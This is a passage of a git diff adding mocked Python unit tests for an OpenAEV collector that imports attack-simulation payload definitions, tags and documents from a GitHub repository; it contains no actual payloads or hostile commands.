MagicMock(path="malware/malicious/evil/payload.json") + content2 = MagicMock(path="malware/malicious/evil/legit.docx") + m_github.return_value.get_repo.return_value.get_contents.return_value = [ + content1, + content2, + ] + + crawler = module.GithubCrawler(repo_name, ref_value) + + folderpath = "malware/malicious/evil" + filename = "payload.json" + + filepath = crawler.get_filepath_if_exists(folderpath, filename) + + self.assertEqual(filepath, "malware/malicious/evil/payload.json") + + filename = "wrong_filename.json" + + filepath = crawler.get_filepath_if_exists(folderpath, filename) + + self.assertIsNone(filepath) + + def test_gen_raw_download_url(self, m_github): + repo_name = "repo/name" + ref_value = "heads/main" + + crawler = module.GithubCrawler(repo_name, ref_value) + + path = "malware/malicious/evil/payload.json" + + raw_url = crawler.gen_raw_download_url(path) + + self.assertEqual( + raw_url, + "https://raw.githubusercontent.com/repo/name/heads/main/malware/malicious/evil/payload.json", + ) diff --git a/openaev/tests/unit/test_openaev_openaev.py b/openaev/tests/unit/test_openaev_openaev.py new file mode 100644 index 00000000..081e4bc8 --- /dev/null +++ b/openaev/tests/unit/test_openaev_openaev.py @@ -0,0 +1,424 @@ +import unittest +from unittest.mock import MagicMock, patch, sentinel + +import openaev.openaev_openaev as module + +daemon_config_data = { + "openaev_url": "http://fake.url", + "openaev_token": "my_awesome_token", + "openaev_url_prefix": "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/", +} + + +@patch.object(module, "GithubCrawler") +class TestOpenAEVOpenAEV(unittest.TestCase): + def test_openaev_collector_init(self, m_githubcrawler): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + self.assertIsInstance(collector.session, module.requests.Session) + self.assertEqual( + collector.openaev_url_prefix, daemon_config_data["openaev_url_prefix"] + ) + m_githubcrawler.assert_called_with("OpenAEV-Platform/payloads", "heads/main") + self.assertEqual(collector.github_crawler, m_githubcrawler.return_value) + self.assertIsNone(collector.current_payload_path) + + def test_openaev_collector_create_or_get_tag(self, m_githubcrawler): + api = MagicMock() + api.tag.upsert.return_value = { + "tag_id": sentinel.tag_id, + } + tag_name = "my tag" + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + tag_id = collector._create_or_get_tag(tag_name) + + api.tag.upsert.assert_called_with( + {"tag_name": tag_name, "tag_color": "#6b7280"} + ) + self.assertEqual(tag_id, sentinel.tag_id) + + tag_color = "#123456" + tag_id = collector._create_or_get_tag(tag_name, tag_color) + + api.tag.upsert.assert_called_with( + {"tag_name": tag_name, "tag_color": tag_color} + ) + self.assertEqual(tag_id, sentinel.tag_id) + + api.tag.upsert.side_effect = Exception("failure") + logger = MagicMock() + collector.logger = logger + + tag_id = collector._create_or_get_tag(tag_name, tag_color) + + logger.warning.assert_called_with("Failed to upsert tag my tag: failure") + self.assertIsNone(tag_id) + + @patch.object(module.OpenAEVOpenAEV, "_create_or_get_tag") + def test_openaev_collector_process_payload_tags( + self, m_create_or_get_tag, m_githubcrawler + ): + _configuration = daemon_config_data + api = MagicMock() + api.tag.upsert.side_effect = [ + {"tag_id": "id_1"}, + {"tag_id": "id_2"}, + ] + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + m_create_or_get_tag.side_effect = [ + "id_3", + "id_4", + ] + + payload = { + "native_collection": True, + "payload_tags": [ + { + "tag_id": "1", + "tag_name": "first", + "tag_color": "#123456", + "foo": "bar", + }, + { + "tag_id": "2", + "tag_name": "second", + "tag_color": "#098765", + "dead": "beef", + }, + ], + } + + tags_mapping, new_tags = collector._process_payload_tags(payload) + + api.tag.upsert.assert_any_call( + {"tag_id": "1", "tag_name": "first", "tag_color": "#123456"}, + ) + api.tag.upsert.assert_called_with( + {"tag_id": "2", "tag_name": "second", "tag_color": "#098765"}, + ) + m_create_or_get_tag.assert_any_call("source:openaev-datasets", "#ef4444") + m_create_or_get_tag.assert_called_with("type:native", "#10b981") + self.assertEqual( + tags_mapping, + { + "1": "id_1", + "2": "id_2", + }, + ) + self.assertEqual( + new_tags, + [ + "id_1", + "id_2", + "id_3", + "id_4", + ], + ) + + def test_openaev_collector_process_payload_attack_patterns(self, m_githubcrawler): + _configuration = daemon_config_data + api = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + payload = { + "payload_attack_patterns": [ + { + "attack_pattern_external_id": "foobar", + "dead": "beef", + "id": "1", + "type": "attack_pattern", + } + ] + } + + attack_patterns = collector._process_payload_attack_patterns(payload) + + api.attack_pattern.upsert.assert_called_with( + [{"attack_pattern_external_id": "foobar", "dead": "beef"}], True + ) + self.assertEqual(attack_patterns, ["foobar"]) + + @patch.object(module.mimetypes, "guess_type") + @patch.object(module.zipfile, "ZipFile") + @patch.object(module.io, "BytesIO") + def test_openaev_collector_process_document( + self, m_bytesio, m_zipfile, m_guess_type, m_githubcrawler + ): + _configuration = daemon_config_data + api = MagicMock() + session = MagicMock() + m_guess_type.return_value = "application/pdf", None + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + collector.session = session + + document_key = "my document key" + payload = { + "my document key": { + "id": "leftover-id", + "type": "documents", + "document_tags": [{"tag_id": "tag1"}], + "document_target": "path.file", + "document_path": "malware/malicious/evil/legit_document.docx", + } + } + tags_mapping = {"tag1": {"key": "value"}} + + payload_document, new_document = collector._process_document( + payload, document_key, tags_mapping + ) + + self.assertIsNone(payload_document.get("id")) + self.assertIsNone(payload_document.get("type")) + self.assertEqual(payload_document["document_tags"], [{"key": "value"}]) + m_githubcrawler.return_value.get_filepath_if_exists.assert_not_called() + m_githubcrawler.return_value.gen_raw_download_url.assert_called_with( + "malware/malicious/evil/legit_document.docx" + ) + session.get.assert_called_with( + m_githubcrawler.return_value.gen_raw_download_url.return_value + ) + session.get.return_value.raise_for_status.assert_called_once() + m_bytesio.assert_any_call(session.get.return_value.content) + m_guess_type.assert_called_with("path.file") + api.document.upsert.assert_called_with( + document=payload_document, + file=( + "path.file", + m_bytesio.return_value.__enter__.return_value, + "application/pdf", + ), + ) + + def test_openaev_collector_is_valid_json_api(self, m_githubcrawler): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + flag = collector._is_valid_json_api({"data": None}) + self.assertTrue(flag) + flag = collector._is_valid_json_api({"payload_information": None}) + self.assertFalse(flag) + + def test_openaev_collector_is_valid_json_flat(self, m_githubcrawler): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + flag = collector._is_valid_json_flat({"payload_information": None}) + self.assertTrue(flag) + flag = collector._is_valid_json_flat({"data": None}) + self.assertFalse(flag) + + @patch.object(module.OpenAEVOpenAEV, "_process_document") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_attack_patterns") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_tags") + @patch.object(module, "json_api_doc") + def test_openaev_collector_process_jsonapi_payload( + self, + m_json_api_doc, + m_process_payload_tags, + m_process_payload_attack_patterns, + m_process_document, + m_githubcrawler, + ): + _configuration = daemon_config_data + payload = MagicMock() + flat_payload = { + "id": "json api id", + "type": "payloads", + "payload_id": "payload id", + "payload_name": "payload name", + "dropper": {"type": "documents"}, + "payload_domains": [ + { + "domain_name": "domain name", + "domain_color": "domain color", + "type": "domains", + "id": "domain id", + } + ], + } + m_json_api_doc.deserialize.return_value = flat_payload + tags_mapping = MagicMock() + new_tags = MagicMock() + m_process_payload_tags.return_value = tags_mapping, new_tags + payload_document = MagicMock() + new_document = MagicMock() + m_process_document.return_value = payload_document, new_document + + collector = module.OpenAEVOpenAEV(_configuration) + + output_payload = collector._process_jsonapi_payload(payload) + + m_json_api_doc.deserialize.assert_called_with(payload) + m_process_payload_tags.assert_called_with(flat_payload) + self.assertEqual(output_payload["payload_tags"], new_tags) + m_process_payload_attack_patterns.assert_called_with(flat_payload) + self.assertEqual( + output_payload["payload_attack_patterns"], + m_process_payload_attack_patterns.return_value, + ) + m_process_document.assert_called_with(flat_payload, "dropper", tags_mapping) + self.assertIsNone(output_payload.get("dropper")) + self.assertEqual(output_payload["payload_document"], payload_document) + self.assertEqual( + output_payload["payload_domains"], + [{"domain_name": "domain name", "domain_color": "domain color"}], + ) + self.assertIsNone(output_payload.get("id")) + self.assertIsNone(output_payload.get("type")) + self.assertIsNone(output_payload.get("payload_id")) + + @patch.object(module.OpenAEVOpenAEV, "_process_document") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_attack_patterns") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_tags") + def test_openaev_collector_process_jsonflat_payload( + self, + m_process_payload_tags, + m_process_payload_attack_patterns, + m_process_document, + m_githubcrawler, + ): + payload_information = { + "payload_external_id": "payload external id", + "payload_name": "payload name", + } + payload = { + "payload_information": payload_information, + } + _configuration = daemon_config_data + tags_mapping = MagicMock() + new_tags = MagicMock() + m_process_payload_tags.return_value = tags_mapping, new_tags + payload_document = MagicMock() + new_document = MagicMock() + m_process_document.return_value = payload_document, new_document + + collector = module.OpenAEVOpenAEV(_configuration) + + output_payload = collector._process_jsonflat_payload(payload) + + m_process_payload_tags.assert_called_with(payload) + self.assertEqual(output_payload["payload_tags"], new_tags) + m_process_payload_attack_patterns.assert_called_with(payload) + self.assertEqual( + output_payload["payload_attack_patterns"], + m_process_payload_attack_patterns.return_value, + ) + m_process_document.assert_called_with(payload, "payload_document", tags_mapping) + + @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") + @patch.object(module.OpenAEVOpenAEV, "_process_jsonapi_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_api") + def test_openaev_collector_process_single_payload_jsonapi_case( + self, + m_is_valid_json_api, + m_process_jsonapi_payload, + m_is_valid_json_flat, + m_process_jsonflat_payload, + m_githubcrawler, + ): + _configuration = daemon_config_data + api = MagicMock() + m_is_valid_json_api.return_value = True + _payload = MagicMock() + m_githubcrawler.return_value.get_json.return_value = _payload + _output_payload = {"payload_name": "name", "payload_external_id": "external-id"} + m_process_jsonapi_payload.return_value = _output_payload + + collector = module.OpenAEVOpenAEV(_configuration) + + collector.api = api + collector.current_payload_path = sentinel.payload_path + + external_id = collector._process_single_payload() + + m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) + m_is_valid_json_api.assert_called_with(_payload) + m_process_jsonapi_payload.assert_called_with(_payload) + m_is_valid_json_flat.assert_not_called() + m_process_jsonflat_payload.assert_not_called() + api.payload.upsert.assert_called_with(m_process_jsonapi_payload.return_value) + self.assertEqual( + _output_payload["payload_collector"], + collector._configuration.get("collector_id"), + ) + self.assertEqual(external_id, "external-id") + + @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") + @patch.object(module.OpenAEVOpenAEV, "_process_jsonapi_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_api") + def test_openaev_collector_process_single_payload_jsonflat_case( + self, + m_is_valid_json_api, + m_process_jsonapi_payload, + m_is_valid_json_flat, + m_process_jsonflat_payload, + m_githubcrawler, + ): + _configuration = daemon_config_data + api = MagicMock() + m_is_valid_json_api.return_value = False + m_is_valid_json_flat.return_value = True + _payload = MagicMock() + m_githubcrawler.return_value.get_json.return_value = _payload + _output_payload = {"payload_name": "name", "payload_external_id": "external-id"} + m_process_jsonflat_payload.return_value = _output_payload + + collector = module.OpenAEVOpenAEV(_configuration) + + collector.api = api + collector.current_payload_path = sentinel.payload_path + + external_id = collector._process_single_payload() + + m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) + m_is_valid_json_api.assert_called_with(_payload) + m_process_jsonapi_payload.assert_not_called() + m_is_valid_json_flat.assert_called_with(_payload) + m_process_jsonflat_payload.assert_called_with(_payload) + api.payload.upsert.assert_called_with(m_process_jsonflat_payload.return_value) + self.assertEqual( + _output_payload["payload_collector"], + collector._configuration.get("collector_id"), + ) + self.assertEqual(external_id, "external-id") + + @patch.object(module.OpenAEVOpenAEV, "_process_single_payload") + def test_openaev_collector_process_message( + self, m_process_single_payload, m_githubcrawler + ): + _configuration = daemon_config_data + payload_path = sentinel.payload_path + m_githubcrawler.return_value.get_json_file_paths.return_value = [payload_path] + api = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + collector._process_message() + + m_githubcrawler.return_value.get_json_file_paths.assert_called_once() + m_process_single_payload.assert_called_once() + self.assertEqual(collector.current_payload_path, sentinel.payload_path) + api.payload.deprecate.assert_called_with( + { + "collector_id": collector._configuration.get("collector_id"), + "payload_external_ids": [m_process_single_payload.return_value], + } + )